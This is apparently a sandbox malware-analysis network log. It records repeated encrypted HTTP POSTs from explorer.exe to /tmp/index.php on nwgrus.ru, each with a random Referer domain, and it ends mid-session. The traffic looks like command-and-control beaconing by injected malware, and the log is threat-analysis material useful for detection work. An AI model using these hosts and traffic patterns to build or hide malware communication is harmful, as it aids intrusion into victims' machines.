                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 219
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:51.448882103 CEST | 219 | OUT | Data Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 38 2a f3 ec
                                                                                                                          Oct 8, 2024 18:23:52.527090073 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:52 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          23 | 192.168.2.6 | 61404 | 160.177.223.165 | 80 | 4004 | C:\Windows\explorer.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Oct 8, 2024 18:23:52.536545038 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://evwfmjkyovghciew.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 264
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:52.536571026 CEST | 264 | OUT | Data Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 3d 5b ed ea
                                                                                                                          Oct 8, 2024 18:23:53.404282093 CEST | 189 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:53 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          24 | 192.168.2.6 | 61419 | 160.177.223.165 | 80 | 4004 | C:\Windows\explorer.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Oct 8, 2024 18:23:54.646945953 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://dxitdoiirfghic.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 220
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:54.646970987 CEST | 220 | OUT | Data Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2c 5b 1c 6b 2c 90 f4 76 0b 75 64 0d e7 90
                                                                                                                          Oct 8, 2024 18:23:55.551220894 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:55 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          25 | 192.168.2.6 | 61424 | 160.177.223.165 | 80 | 4004 | C:\Windows\explorer.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Oct 8, 2024 18:23:55.566946983 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://goilbsuxbgu.com/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 341
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:55.566965103 CEST | 341 | OUT | Data Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 3f 2b aa fd
                                                                                                                          Oct 8, 2024 18:23:56.454329967 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:56 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID: 26  Source IP: 192.168.2.6  Source Port: 61425  Destination IP: 160.177.223.165  Destination Port: 80  PID: 4004  Process: C:\Windows\explorer.exe
Timestamp: Oct 8, 2024 18:23:56.480500937 CEST  Bytes transferred: 283  Direction: OUT  Data: POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://bmhunjcauidhfjas.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 232
Host: nwgrus.ru
Timestamp: Oct 8, 2024 18:23:56.480523109 CEST  Bytes transferred: 232  Direction: OUT  Data Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 72 2e bf 9a
Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vur.xSHc XgW.+tE_fB^:D>#Es7}_*^7Ua=&*Qt3m{)_N6
Timestamp: Oct 8, 2024 18:23:57.350981951 CEST  Bytes transferred: 484  Direction: IN  Data: HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Tue, 08 Oct 2024 16:23:57 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID: 27  Source IP: 192.168.2.6  Source Port: 61426  Destination IP: 160.177.223.165  Destination Port: 80  PID: 4004  Process: C:\Windows\explorer.exe
Timestamp: Oct 8, 2024 18:23:57.424079895 CEST  Bytes transferred: 278  Direction: OUT  Data: POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ehqwwnwmwdh.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 208
Host: nwgrus.ru
Timestamp: Oct 8, 2024 18:23:57.424102068 CEST  Bytes transferred: 208  Direction: OUT  Data Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 38 3b d5 aa
Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vu8;,q@QxbjY1R5=Q9?v=t/C#*9"BJD/[baM_-VC2*mvt179j
Timestamp: Oct 8, 2024 18:23:58.385658979 CEST  Bytes transferred: 484  Direction: IN  Data: HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Tue, 08 Oct 2024 16:23:58 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID: 28  Source IP: 192.168.2.6  Source Port: 61427  Destination IP: 160.177.223.165  Destination Port: 80  PID: 4004  Process: C:\Windows\explorer.exe
Timestamp: Oct 8, 2024 18:23:59.025120974 CEST  Bytes transferred: 282  Direction: OUT  Data: POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://oawojikvjxqxudp.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 244
Host: nwgrus.ru
Timestamp: Oct 8, 2024 18:23:59.025186062 CEST  Bytes transferred: 244  Direction: OUT  Data Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 20 0f b7 a3
Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vu m2.[T_cxN\Wz#8;&WO%iw_='tMr$|MTvV'~G8M&GMTT"gwgUF
Timestamp: Oct 8, 2024 18:23:59.889595985 CEST  Bytes transferred: 484  Direction: IN  Data: HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Tue, 08 Oct 2024 16:23:59 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID: 29  Source IP: 192.168.2.6  Source Port: 61428  Destination IP: 160.177.223.165  Destination Port: 80  PID: 4004  Process: C:\Windows\explorer.exe
Timestamp: Oct 8, 2024 18:23:59.901226997 CEST  Bytes transferred: 280  Direction: OUT  Data: POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://xlurbvunmfixk.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 320
Host: nwgrus.ru
Timestamp: Oct 8, 2024 18:23:59.901226997 CEST  Bytes transferred: 320  Direction: OUT  Data Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 3e 0f a1 e5
Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vu>nX\eo"jyQXg(cN9d#QNV9(1A7&76f3<-D7sW)"vu0Ot=54'd
Timestamp: Oct 8, 2024 18:24:00.795069933 CEST  Bytes transferred: 484  Direction: IN  Data: HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Tue, 08 Oct 2024 16:24:00 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID: 30  Source IP: 192.168.2.6  Source Port: 61429  Destination IP: 160.177.223.165  Destination Port: 80  PID: 4004  Process: C:\Windows\explorer.exe
Timestamp: Oct 8, 2024 18:24:00.807672024 CEST  Bytes transferred: 280  Direction: OUT  Data: POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://kamxftfsfgaby.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 116
Host: nwgrus.ru
Timestamp: Oct 8, 2024 18:24:00.807698011 CEST  Bytes transferred: 116  Direction: OUT  Data Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 66 5b ab ba
Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vuf[Y]^`Zw77]}%l
Timestamp: Oct 8, 2024 18:24:01.753901005 CEST  Bytes transferred: 484  Direction: IN  Data: HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Tue, 08 Oct 2024 16:24:01 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID: 31  Source IP: 192.168.2.6  Source Port: 61430  Destination IP: 160.177.223.165  Destination Port: 80  PID: 4004  Process: C:\Windows\explorer.exe
Timestamp: Oct 8, 2024 18:24:01.761770964 CEST  Bytes transferred: 280  Direction: OUT  Data: POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://oqmylvnapebvw.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 298
Host: nwgrus.ru
Timestamp: Oct 8, 2024 18:24:01.761794090 CEST  Bytes transferred: 298  Direction: OUT  Data Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 65 1f d0 f7
Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vuei9_ON`J2zYt(b<OwPZ'dzg>Pj1fODG~^g'`f+*^=&aiMpak2\`
Timestamp: Oct 8, 2024 18:24:02.629125118 CEST  Bytes transferred: 484  Direction: IN  Data: HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Tue, 08 Oct 2024 16:24:02 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.6 | 61455 | 160.177.223.165 | 80 | 4004 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 18:25:08.842891932 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://hyeljwvkydclsem.net/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 221
    Host: nwgrus.ru
Oct 8, 2024 18:25:08.842936039 CEST | 221 | OUT | Data Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 72 22 ab 9f
    Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA .[k,vur"s-fCr|D=\u$vE%k[9CzYY,%5/D#EXAU4Et.,MK
Oct 8, 2024 18:25:09.724469900 CEST | 151 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.26.0
    Date: Tue, 08 Oct 2024 16:25:09 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    Data Raw: 03 00 00 00 72 e8 84
    Data Ascii: r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.6 | 61456 | 160.177.223.165 | 80 | 4004 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 18:25:10.395896912 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://ovnkboilnwpev.org/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 185
    Host: nwgrus.ru
Oct 8, 2024 18:25:10.395910025 CEST | 185 | OUT | Data Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 62 49 a6 97
    Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA .[k,vubIO~bpy9SM`!HGKG"7#%NV&6bm\\Y/\
Oct 8, 2024 18:25:11.260760069 CEST | 151 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.26.0
    Date: Tue, 08 Oct 2024 16:25:11 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    Data Raw: 03 00 00 00 72 e8 84
    Data Ascii: r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.6 | 61457 | 160.177.223.165 | 80 | 4004 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 18:25:16.983130932 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://elavhytildeantb.net/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 307
    Host: nwgrus.ru
Oct 8, 2024 18:25:16.983166933 CEST | 307 | OUT | Data Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7b 54 d5 be
    Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA .[k,vu{T2E|w0 F!/_`40aX?G H7GQs"_{x]%5wN63gl$\rt=96
Oct 8, 2024 18:25:17.848952055 CEST | 151 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.26.0
    Date: Tue, 08 Oct 2024 16:25:17 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    Data Raw: 03 00 00 00 72 e8 84
    Data Ascii: r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.6 | 61458 | 160.177.223.165 | 80 | 4004 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 18:25:24.807482958 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://qvpxnipvuyciicri.org/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 192
    Host: nwgrus.ru
Oct 8, 2024 18:25:24.807482958 CEST | 192 | OUT | Data Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 55 30 a4 85
    Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA .[k,vuU0`F`r?y2RD*F@'w!"~>R=iR'T]c@w5
Oct 8, 2024 18:25:25.693137884 CEST | 151 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.26.0
    Date: Tue, 08 Oct 2024 16:25:25 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    Data Raw: 03 00 00 00 72 e8 84
    Data Ascii: r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.6 | 61459 | 160.177.223.165 | 80 | 4004 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 18:25:34.039405107 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://nsxfaafbvsvkfwb.net/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 368
    Host: nwgrus.ru
Oct 8, 2024 18:25:34.039423943 CEST | 368 | OUT | Data Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 22 1c a7 fa
    Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA .[k,vu"P4ClK[|Oz_\/y}s1G'cu(_r9#, 3@y>[?a[+R3^<rZZC=^eu`UG
Oct 8, 2024 18:25:34.892144918 CEST | 151 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.26.0
    Date: Tue, 08 Oct 2024 16:25:34 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    Data Raw: 03 00 00 00 72 e8 84
    Data Ascii: r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.6 | 61461 | 160.177.223.165 | 80 | 4004 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 18:25:45.764981985 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://euvycibbjmraba.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 340
    Host: nwgrus.ru
Oct 8, 2024 18:25:45.765023947 CEST | 340 | OUT | Data Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 70 42 d6 a1
    Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA .[k,vupBa"cCB0$J0}jiII{G[N=EAJ5>dvG3MC.J@\{$'*Vew>@SwP-T]Q-
Oct 8, 2024 18:25:46.637793064 CEST | 151 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.26.0
    Date: Tue, 08 Oct 2024 16:25:46 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    Data Raw: 03 00 00 00 72 e8 84
    Data Ascii: r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.6 | 61462 | 160.177.223.165 | 80 | 4004 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 18:25:59.053148985 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://istrtdmsewdifyn.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 241
    Host: nwgrus.ru
Oct 8, 2024 18:25:59.053181887 CEST | 241 | OUT | Data Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5f 3e c7 fd
    Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA .[k,vu_>[PlxMdMevC?w j-Qo3'Zi@-.a{oI\pysu;:Y`.aB/0o#I%z
Oct 8, 2024 18:25:59.918047905 CEST | 151 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.26.0
    Date: Tue, 08 Oct 2024 16:25:59 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    Data Raw: 03 00 00 00 72 e8 84
    Data Ascii: r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.6 | 61464 | 190.249.249.14 | 80 | 4004 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 18:26:16.351247072 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://chihuprqnvownoad.org/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 284
    Host: nwgrus.ru
Oct 8, 2024 18:26:16.351275921 CEST | 284 | OUT | Data Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 21 3e e5 a3
